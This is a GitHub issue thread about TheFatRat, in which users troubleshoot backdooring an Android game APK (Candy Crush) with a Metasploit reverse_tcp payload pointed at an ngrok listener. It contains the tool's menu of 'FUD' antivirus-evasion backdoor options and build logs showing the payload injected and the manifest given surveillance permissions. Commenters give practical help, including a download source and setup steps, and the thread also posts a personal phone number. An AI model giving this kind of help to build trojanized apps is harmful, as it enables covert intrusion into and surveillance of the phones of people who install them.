Closed a-zamani closed 5 years ago
doortack
commented
6 years ago I also had trouble the first time I tried to infect and APK file it said the exact same thing it said to you. So what I did was I re-downloaded very small game that was APK and then just tried it again using a different option. What are the options that you used from the first option list all the way to the end if you could tell me that I might be able to help more
a-zamani
commented
6 years ago I will proceed to the following steps to build the "backdoor" file.
AND Option 1 gives the file uninstallable [01] Create Backdoor with msfvenom It does not work
Was my answer complete?
doortack
commented
6 years ago I would just try doing it with a different. APK file. I don't think it's because you're using NGROK since your problem doesn't stem from connecting. Why do you put ./futt ? I didn't have to do that. The last thing I could recommend is making sure everything you do is in root. That screwed me up the first time. Oh yes and are all your dependencies installed?
a-zamani
commented
6 years ago Where do I download the apk file?what is your suggestion؟ Sorry, I was writing mistakes. I mean "./fatrat". Yes, all parts are installed correctly. The software does not provide any warning and everything is safe.
a-zamani
commented
6 years ago Would not my WiFi dongle be appropriate?
doortack
commented
6 years ago Give me one second and I will find where I downloaded my. APK file from. Mine was the Candy Crush game that I just sideloaded from the internet without using the Google Play Store. What is the. APK application that you're trying to infect? And where did you get it? I truly believe that's the problem. And no I don't believe your adapter is an issue as long as you can get an IP address and you're online. The error you're getting is stimming from it not being able to completely right to the APK file.
doortack
commented
6 years ago https://www.androidapksfree.com/apk/candy-crush-saga-apk-latest-version-download/ Make sure you have the .APK in a folder with root before you try to inject to it.
a-zamani
commented
6 years ago thank you . I'm testing. Sure♥
doortack
commented
6 years ago No problem buddy I hope it works for you and if not let me know.
a-zamani
commented
6 years ago [01] Create Backdoor with msfvenom
[02] Create Fud 100% Backdoor with Fudwin 1.0
[03] Create Fud Backdoor with Avoid v1.2
[04] Create Fud Backdoor with backdoor-factory [embed]
[05] Backdooring Original apk [Instagram, Line,etc]
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
[07] Create Backdoor For Office with Microsploit
[08] Trojan Debian Package For Remote Acces [Trodebi]
[09] Load/Create auto listeners
[10] Jump to msfconsole
[11] Searchsploit
[12] File Pumper [Increase Your Files Size]
[13] Configure Default Lhost & Lport
[14] Cleanup
[15] Help
[16] Credits
[17] Exit ┌─[TheFatRat]──[~]─[menu]: └─────► 5
[ ] Embed a Metasploit Payload in an original .apk files [ ] [ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ] [ ]===========================================================================[ ]
Cleaning Temp files Done!
Your local IPV4 address is : 192.168.8.128 Your local IPV6 address is : fe80::2**c Your public IP address is : 45.142 Your Hostname is : 3(NXDAIN
Set LHOST IP: 0.tcp.ngrok.io
Set LPORT: 15079
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /root/Downloads/candycrushsaga.apk
+-------------------------------------------+ | [ 1 ] android/meterpreter/reverse_http | | [ 2 ] android/meterpreter/reverse_https | | [ 3 ] android/meterpreter/reverse_tcp | | [ 4 ] android/shell/reverse_http | | [ 5 ] android/shell/reverse_https | | [ 6 ] android/shell/reverse_tcp | +-------------------------------------------+
Choose Payload : 3 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] +------------------------------+ | [ 1 ] Use Backdoor-apk 0.2.2 | | [ 2 ] Use old Fatrat method | +------------------------------+
Select Tool to create apk : 2
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$ Generate Backdoor +------------++-------------------------++-----------------------+ | Name || Descript || Your Input +------------++-------------------------++-----------------------+ | LHOST || The Listen Addres || 0.tcp.ngrok.io | LPORT || The Listen Ports || 15079 | OUTPUTNAME || The Filename output || app_backdoored.apk | PAYLOAD || Payload To Be Used || android/meterpreter/reverse_tcp +------------++-------------------------++-----------------------+
[] Creating RAT payload with msfvenom [✔] Done! [] Creating a Valid Certificate [✔] Done! [*] Starting the merging process of RAT with the APK you selected
ruby: warning: shebang line ending with \r may cause problems
[] Signing payload..
[] Decompiling original APK..
[] Decompiling payload APK..
[] Locating onCreate() hook..
[] Copying payload files..
[] Loading temp/original/smali/com/king/candycrushsaga/CandyCrushSagaActivity.smali and injecting payload..
[] Poisoning the manifest with meterpreter permissions..
[] Adding android.permission.CHANGE_WIFI_STATE
[] Adding android.permission.ACCESS_COARSE_LOCATION
.
.
.
[] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding /root/TheFatRat-master/temp/app.apk with meterpreter injection as /root/TheFatRat-master/temp/app_backdoored.apk..
W: ERROR: Unknown option '--forced-package-id'
W: Android Asset Packaging Tool
W:
W: Usage:
W: aapt l[ist] [-v] [-a] file.{zip,jar,apk}
W: List contents of Zip-compatible archive.
W:
W: aapt d[ump] [--values] [--include-meta-data] WHAT file.{apk} [asset [asset ...]]
W: strings Print the contents of the resource table string pool in the APK.
W: badging Print the label and icon for the app declared in APK.
W: permissions Print the permissions from the APK.
W: resources Print the resource table from the APK.
W: configurations Print the configurations in the APK.
W: xmltree Print the compiled xmls in the given assets.
W: xmlstrings Print the strings of the given compiled xml assets.
W:
W: aapt p[ackage] [-d][-f][-m][-u][-v][-x][-z][-M AndroidManifest.xml] \
W: [-0 extension [-0 extension ...]] [-g tolerance] [-j jarfile] \
W: [--debug-mode] [--min-sdk-version VAL] [--target-sdk-version VAL] \
W: [--app-version VAL] [--app-version-name TEXT] [--custom-package VAL] \
W: [--rename-manifest-package PACKAGE] \
W: [--rename-instrumentation-target-package PACKAGE] \
W: [--utf16] [--auto-add-overlay] \
W: [--max-res-version VAL] \
W: [-I base-package [-I base-package ...]] \
W: [-A asset-source-dir] [-G class-list-file] [-P public-definitions-file] \
W: [-D main-dex-class-list-file] \
W: [-S resource-sources [-S resource-sources ...]] \
W: [-F apk-file] [-J R-file-dir] \
W: [--product product1,product2,...] \
W: [-c CONFIGS] [--preferred-density DENSITY] \
W: [--split CONFIGS [--split CONFIGS]] \
W: [--feature-of package [--feature-after package]] \
W: [raw-files-dir [raw-files-dir] ...] \
W: [--output-text-symbols DIR]
W:
W: Package the android resources. It will read assets and resources that are
W: supplied with the -M -A -S or raw-files-dir arguments. The -J -P -F and -R
W: options control which files are output.
W:
W: aapt r[emove] [-v] file.{zip,jar,apk} file1 [file2 ...]
W: Delete specified files from Zip-compatible archive.
W:
Exception in thread "main" W: aapt a[dd] [-v] file.{zip,jar,apk} file1 [file2 ...]
W: Add specified files to Zip-compatible archive.
W:
W: aapt c[runch] [-v] -S resource-sources ... -C output-folder ...
W: Do PNG preprocessing on one or several resource folders
W: and store the results in the output folder.
W:
W: aapt s[ingleCrunch] [-v] -i input-file -o outputfile
W: Do PNG preprocessing on a single file.
W:
W: aapt v[ersion]
W: Print program version.
W:
.
.
.
.
W: changed to absolute names with the old package so that the code
W: does not need to change.
W: --rename-instrumentation-target-package
W: Rewrite the manifest so that all of its instrumentation
W: components target the given package. Useful when used in
W: conjunction with --rename-manifest-package to fix tests against
brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [aapt, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 25, --version-code, 1129002, --version-name, 1.129.0.2, --no-version-vectors, -F, /tmp/APKTOOL3506179456145225376.tmp, -0, arsc, -0, META-INF/android.arch.lifecycle_runtime.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-media-compat.version, -0, META-INF/com.android.support_support-v4.version, -0, assets/res_output/kingdom-views/content.meta.xml, -0, assets/res_output/levels/content.meta.xml, -0, assets/res_output/models/content.meta.xml, -0, assets/res_output/servicelayer-views/content.meta.xml, -0, woff2, -0, assets/res_output/tex/content.meta.xml, -0, assets/res_output/tex/menu/content.meta.xml, -0, vbl, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat-master/temp/original/res, -M, /root/TheFatRat-master/temp/original/AndroidManifest.xml]
at brut.androlib.Androlib.buildResourcesFull(Androlib.java:477)
at brut.androlib.Androlib.buildResources(Androlib.java:411)
at brut.androlib.Androlib.build(Androlib.java:310)
at brut.androlib.Androlib.build(Androlib.java:263)
at brut.apktool.Main.cmdBuild(Main.java:227)
at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [aapt, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 25, --version-code, 1129002, --version-name, 1.129.0.2, --no-version-vectors, -F, /tmp/APKTOOL3506179456145225376.tmp, -0, arsc, -0, META-INF/android.arch.lifecycle_runtime.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-media-compat.version, -0, META-INF/com.android.support_support-v4.version, -0, assets/res_output/kingdom-views/content.meta.xml, -0, assets/res_output/levels/content.meta.xml, -0, assets/res_output/models/content.meta.xml, -0, assets/res_output/servicelayer-views/content.meta.xml, -0, woff2, -0, assets/res_output/tex/content.meta.xml, -0, assets/res_output/tex/menu/content.meta.xml, -0, vbl, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat-master/temp/original/res, -M, /root/TheFatRat-master/temp/original/AndroidManifest.xml]
at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:440)
at brut.androlib.Androlib.buildResourcesFull(Androlib.java:463)
... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 2): [aapt, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 25, --version-code, 1129002, --version-name, 1.129.0.2, --no-version-vectors, -F, /tmp/APKTOOL3506179456145225376.tmp, -0, arsc, -0, META-INF/android.arch.lifecycle_runtime.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-media-compat.version, -0, META-INF/com.android.support_support-v4.version, -0, assets/res_output/kingdom-views/content.meta.xml, -0, assets/res_output/levels/content.meta.xml, -0, assets/res_output/models/content.meta.xml, -0, assets/res_output/servicelayer-views/content.meta.xml, -0, woff2, -0, assets/res_output/tex/content.meta.xml, -0, assets/res_output/tex/menu/content.meta.xml, -0, vbl, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat-master/temp/original/res, -M, /root/TheFatRat-master/temp/original/AndroidManifest.xml]
at brut.util.OS.exec(OS.java:95)
at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:434)
... 6 more
W: a package that has been renamed.
W: --product
W: Specifies which variant to choose for strings that have
W: product variants
W: --utf16
W: changes default encoding for resources to UTF-16. Only useful when API
W: level is set to 7 or higher where the default encoding is UTF-8.
W: --non-constant-id
W: Make the resources ID non constant. This is required to make an R java class
W: that does not contain the final value but is used to make reusable compiled
W: libraries that need to access resources.
W: --shared-lib
W: Make a shared library resource package that can be loaded by an application
W: at runtime to access the libraries resources. Implies --non-constant-id.
W: --app-as-shared-lib
W: Make an app resource package that also can be loaded as shared library at runtime.
W: Implies --non-constant-id.
W: --error-on-failed-insert
W: Forces aapt to return an error if it fails to insert values into the manifest
W: with --debug-mode, --min-sdk-version, --target-sdk-version --version-code
W: and --version-name.
W: Insertion typically fails if the manifest already defines the attribute.
W: --error-on-missing-config-entry
W: Forces aapt to return an error if it fails to find an entry for a configuration.
W: --output-text-symbols
W: Generates a text file containing the resource symbols of the R class in the
W: specified folder.
W: --ignore-assets
W: Assets to be ignored. Default pattern is:
W: !.svn:!.git:!.dsstore:!.scc:.:
\e[1;31m [x] There was an error in the creation of your RAT APK file , the possible reasons are :
Press [ENTER] key to return to fatrat menu
`
doortack
commented
6 years ago I almost have the answer it's pretty easy to explain but let me make sure I get it right. Give me about 5 minutes
a-zamani
commented
6 years ago OK : )
doortack
commented
6 years ago Hey brother do you have Facebook Messenger because I realize this is going to take a bit of explaining and I'd rather do it you know where I can copy and paste screenshots to you.
Me: Emmanuel Goldstein
a-zamani
commented
6 years ago I'm sorry. I deleted my Facebook page after disclosing information by Facebook. Through another WhatsApp Email telegram
doortack
commented
6 years ago We can use WhatsApp if that's cool with you. Give me about 2 minutes to download it and send me your I guess screen name.
doortack
commented
6 years ago hey brother I was forced to get telegram instead because WhatsApp would not recognize my cell phone number. It's installed and ready to go now how do I contact you
a-zamani
commented
6 years ago OK Send a telegram now It is possible?
doortack
commented
6 years ago (281) 572-6297 Mike Jones
doortack
commented
6 years ago ------- Your APK.log showing problems -------
[] Creating RAT payload with msfvenom [✔] Done! [] Creating a Valid Certificate [✔] Done! [*] Starting the merging process of RAT with the APK you selected
ruby: warning: shebang line ending with \r may cause problems [] Signing payload.. [] Decompiling original APK.. [] Decompiling payload APK.. [] Locating onCreate() hook.. [] Copying payload files.. [] Loading temp/original/smali/com/king/candycrushsaga/CandyCrushSagaActivity.smali and injecting payload.. [] Poisoning the manifest with meterpreter permissions.. [] Adding android.permission.CHANGE_WIFI_STATE [] Adding android.permission.ACCESS_COARSE_LOCATION
------ Your APK.log showing problems (THE CRASH) -------
Infected file /root/TheFatRat-master/temp/app_backdoored.apk ready.
\e[1;31m [x] There was an error in the creation of your RAT APK file , the possible reasons are :
The architecture of the file is not for android
The original APK is protected
It was not possible to inject the payload in the hook you selected (in this case select a different hook point)
Check log file at : /root/TheFatRat-master/logs/apk-old.log/usr/bin/xterm /usr/bin/dig /usr/bin/gcc /usr/sbin/apache2 /usr/bin/gnome-terminal /usr/bin/upx /usr/bin/ruby /usr/bin/openssl /usr/bin/jarsigner /usr/bin/unzip /usr/bin/keytool /root/TheFatRat/tools/android-sdk/zipalign /root/TheFatRat/tools/proguard5.3.2/lib/proguard /usr/bin/x86_64-w64-mingw32-gcc /usr/bin/i686-w64-mingw32-gcc /usr/local/sbin/dx /usr/local/sbin/aapt /usr/local/sbin/apktool /usr/local/sbin/d2j-dex2jar msfconsole msfvenom backdoor-factory searchsploit /usr/local/sbin/fatrat
###### My APK.log #######136122818 9788 files No encoder or badchars specified, outputting raw payload Payload size: 10100 bytes Saved as: /root/TheFatRat/temp/Rat.apk I: Using Apktool 2.2.2 on Rat.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources...
doortack
commented
6 years ago Install Instructions Quick Check
Installation for Apktool
Linux:
Download Linux wrapper script (Right click, Save Link As apktool)
Download apktool-2 (find newest here)
Rename downloaded jar to apktool.jar
Move both files (apktool.jar & apktool) to /usr/local/bin (root needed)
Make sure both files are executable (chmod +x)
Try running apktool via cliI'm sorry to reply late. I do all the steps and let you know the result. ♥
a-zamani
commented
6 years ago
root@zamani:~# java -version
openjdk version "10.0.1" 2018-04-17
OpenJDK Runtime Environment (build 10.0.1+10-Debian-4)
OpenJDK 64-Bit Server VM (build 10.0.1+10-Debian-4, mixed mode)
==========================================
root@zamani:/usr/local/bin# chmod +x ./apktool.jar
root@zamani:/usr/local/bin# ./apktool.jar
Apktool v2.3.3 - a tool for reengineering Android apk files
with smali v2.2.2 and baksmali v2.2.2
Copyright 2014 Ryszard Wiśniewski <brut.alll@gmail.com>
Updated by Connor Tumbleson <connor.tumbleson@gmail.com>
usage: apktool
-advance,--advanced prints advance information.
-version,--version prints the version then exits
usage: apktool if|install-framework [options] <framework.apk>
-p,--frame-path <dir> Stores framework files into <dir>.
-t,--tag <tag> Tag frameworks using <tag>.
usage: apktool d[ecode] [options] <file_apk>
-f,--force Force delete destination directory.
-o,--output <dir> The name of folder that gets written. Default is apk.out
-p,--frame-path <dir> Uses framework files located in <dir>.
-r,--no-res Do not decode resources.
-s,--no-src Do not decode sources.
-t,--frame-tag <tag> Uses framework files tagged by <tag>.
usage: apktool b[uild] [options] <app_path>
-f,--force-all Skip changes detection and build all files.
-o,--output <dir> The name of apk that gets written. Default is dist/name.apk
-p,--frame-path <dir> Uses framework files located in <dir>.
For additional info, see: http://ibotpeaches.github.io/Apktool/
For smali/baksmali info, see: https://github.com/JesusFreke/smali
======================================
root@zamani:/usr/local/bin# chmod +x apktool.bat
root@zamani:/usr/local/bin# ./apktool.bat
no main manifest attribute, in /usr/local/bin/apktool.bat
I know that the code I installed is funny :D But I did not know how to do it
shashankgupta7
commented
6 years ago Hello guys, I'm getting some error in fatrat, Someone please help me, I've tried everything but no luck, I'm using Fatrat on parrot os installed on Virtualbox and I'm using VPN service to port forward. Please help me.
[x] There was an error in the creation of your RAT APK file , the possible reasons are :
radiator303
commented
5 years ago I think these few steps will help:
[https://github.com/Screetsec/TheFatRat/issues/340#issuecomment-507457574]
Oforimoses
commented
4 years ago Guys am getting this error any help
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /root/Downloads/ofori.apk
File does not exist , make sure you write the right path of it .
brokeboy070
commented
2 years ago Pls I have an issues installing up fatrat, it says I need to root my device before I can start it up😔. Pls I need help
Hi. My problem is in the last step of creating a "Backdoor" file. It worked well before !! Method 1 is not good because the file is not installed on the phone, but method number 5 is very good for the original file I am at the last stage:
**_File : any orginal .apk for example Flopy Bird_v3.apk
Dongle wifi : Found 4 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 509 NetworkManager 940 wpasupplicant 3294 dhclient 3528 dhclient PHY Interface Driver Chipset phy0 wlan0 rt2800usb D-Link System DWA-125 Wireless N 150 Adapter(rev.A2) [Ralink RT3070] (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)**
I'm sorry for the beginner's question thanks.